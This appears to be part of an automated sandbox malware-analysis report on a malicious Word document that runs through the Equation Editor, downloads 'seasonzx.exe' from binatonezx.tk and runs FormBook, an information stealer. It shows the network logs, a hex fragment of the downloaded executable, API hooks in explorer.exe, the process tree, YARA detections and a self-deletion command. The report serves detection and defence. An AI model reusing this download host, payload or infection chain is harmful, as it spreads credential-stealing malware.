                                              Oct 27, 2021 16:42:18.048450947 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.048492908 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.048512936 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.048542023 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.048571110 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.048613071 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.048630953 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.048661947 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.048688889 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.048729897 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.048747063 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.048782110 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.048804045 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.048844099 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.048896074 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.048904896 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.048960924 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.049001932 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.049020052 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.049055099 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.049089909 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.049160957 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.049210072 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.049247980 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.049266100 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.049288988 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.049331903 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.049380064 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.049393892 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.049427986 CEST4916580192.168.2.222.56.59.211

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 27, 2021 16:42:17.869247913 CEST5216753192.168.2.228.8.8.8
                                              Oct 27, 2021 16:42:17.888603926 CEST53521678.8.8.8192.168.2.22
                                              Oct 27, 2021 16:44:14.257828951 CEST5059153192.168.2.228.8.8.8
                                              Oct 27, 2021 16:44:14.508419037 CEST53505918.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Oct 27, 2021 16:42:17.869247913 CEST192.168.2.228.8.8.80x567bStandard query (0)binatonezx.tkA (IP address)IN (0x0001)
                                              Oct 27, 2021 16:44:14.257828951 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.lenovoidc.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Oct 27, 2021 16:42:17.888603926 CEST8.8.8.8192.168.2.220x567bNo error (0)binatonezx.tk2.56.59.211A (IP address)IN (0x0001)
                                              Oct 27, 2021 16:44:14.508419037 CEST8.8.8.8192.168.2.220xc18cName error (3)www.lenovoidc.comnonenoneA (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • binatonezx.tk

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.22491652.56.59.21180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              Oct 27, 2021 16:42:17.944622040 CEST0OUTGET /seasonzx.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: binatonezx.tk
                                              Connection: Keep-Alive
                                              Oct 27, 2021 16:42:17.983454943 CEST2INHTTP/1.1 200 OK
                                              Date: Wed, 27 Oct 2021 14:42:17 GMT
                                              Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips
                                              Last-Modified: Wed, 27 Oct 2021 07:19:00 GMT
                                              ETag: "80800-5cf50687391d8"
                                              Accept-Ranges: bytes
                                              Content-Length: 526336
                                              Vary: User-Agent
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 a4 78 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 07 00 00 08 00 00 00 00 00 00 3e 1d 08 00 00 20 00 00 00 20 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 1c 08 00 4f 00 00 00 00 20 08 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 fd 07 00 00 20 00 00 00 fe 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 20 08 00 00 06 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 1d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 10 be 00 00 c4 be 00 00 03 00 00 00 74 01 00 06 d4 7c 01 00 18 a0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 17 00 00 0a 00 00 2a 00 00 1b 30 02 00 48 00 00 00 01 00 00 11 14 80 01 00 00 04 73 18 00 00 0a 80 02 00 00 04 00 7e 02 00 00 04 0a 16 0b 06 12 01 28 19 00 00 0a 00 00 7e 01 00 00 04 14 fe 01 0c 08 2c 0a 73 01 00 00 06 80 01 00 00 04 00 de 0b 07 2c 07 06 28 1a 00 00 0a 00 dc 2a 01 10 00 00 02 00 19 00 23 3c 00 0b 00 00 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 03 00 00 11 00 73 0b 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 73 52 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 05 00 00 11 00 73 54 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 06 00 00 11 00 73 a1 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 07 00 00 11 00 73 cf 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 00 73 da 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 09 00 00 11 00 73 80 00 00 06 0a 2b 00 06 2a 8a 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 72 01 00 00 70 7d 05 00 00 04 2a 7a 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 05 00 00 04 2a 96 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 05 00 00 04 02 04 7d 03 00 00 04 2a b2 02
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxa0> @ `@O @ H.textD `.rsrc @@.reloc@@B Ht|&(*0Hs~(~,s,(*#<0+*0s+*0sR+*0sT+*0s+*0s+*0s+*0s+*}}(rp}*z}}(}*}}(}}*


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: USER32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEB
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEB
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEB
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEB

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: WINWORD.EXE PID: 940 Parent PID: 596

                                              General

                                              Start time:16:42:17
                                              Start date:27/10/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                              Imagebase:0x13f600000
                                              File size:1423704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: EQNEDT32.EXE PID: 1532 Parent PID: 596

                                              General

                                              Start time:16:42:19
                                              Start date:27/10/2021
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: seasonhd72463.exe PID: 1812 Parent PID: 1532

                                              General

                                              Start time:16:42:21
                                              Start date:27/10/2021
                                              Path:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Imagebase:0x1100000
                                              File size:526336 bytes
                                              MD5 hash:9227463FFB6E37D271919E06D175EDA7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 23%, ReversingLabs
                                              Reputation:low

                                              Analysis Process: seasonhd72463.exe PID: 2820 Parent PID: 1812

                                              General

                                              Start time:16:42:25
                                              Start date:27/10/2021
                                              Path:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Imagebase:0x1100000
                                              File size:526336 bytes
                                              MD5 hash:9227463FFB6E37D271919E06D175EDA7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: explorer.exe PID: 1764 Parent PID: 2820

                                              General

                                              Start time:16:42:27
                                              Start date:27/10/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              Analysis Process: msiexec.exe PID: 2004 Parent PID: 1764

                                              General

                                              Start time:16:42:41
                                              Start date:27/10/2021
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\msiexec.exe
                                              Imagebase:0xb50000
                                              File size:73216 bytes
                                              MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Analysis Process: cmd.exe PID: 2176 Parent PID: 2004

                                              General

                                              Start time:16:42:45
                                              Start date:27/10/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'
                                              Imagebase:0x4a880000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >